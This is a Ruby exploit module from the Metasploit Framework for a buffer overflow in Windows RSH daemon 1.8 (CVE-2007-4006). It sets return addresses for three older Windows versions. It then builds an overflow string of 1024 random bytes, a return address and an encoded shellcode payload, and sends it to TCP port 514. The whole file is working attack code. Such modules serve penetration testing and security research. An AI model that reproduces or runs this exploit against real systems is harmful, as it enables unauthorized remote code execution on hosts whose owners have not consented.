### $Id: windows_rsh.rb 9179 2010-04-30 08:40:19Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,'Name' => 'Windows RSH daemon Buffer Overflow','Description'=> %q{
This module exploits a vulnerabliltiy in Windows RSH daemon 1.8.
The vulnerability is due to a failure to check for the length of input sent
to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit
to be successful.},'Author' => 'MC','License'=> MSF_LICENSE,'Version'=> '$Revision: 9179 $','References' =>
[['CVE','2007-4006'],['OSVDB','38572'],['BID','25044'],],'DefaultOptions' =>
{'EXITFUNC' => 'thread',},'Payload'=>
{'Space'=> 850,'BadChars' => "\x00",'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",'EncoderType' => Msf::Encoder::Type::AlphanumUpper,},'Platform' => 'win','Targets'=>
[['Windows 2003 SP1 English',{'Ret' => 0x77409dbb }],['Windows XP Pro SP2 English',{'Ret' => 0x7e497c7b }],['Windows 2000 Pro SP4 English',{'Ret' => 0x77f81be3 }],],'Privileged' => true,'DisclosureDate' => 'Jul 24 2007','DefaultTarget' => 0))
register_options([Opt::RPORT(514)], self.class)end
def exploit
connect
sploit =(("\x00"+ rand_text_english(1))* 2)+"\x00"
sploit << rand_text_english(1024)+[target.ret].pack('V')
sploit << payload.encoded
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
endend
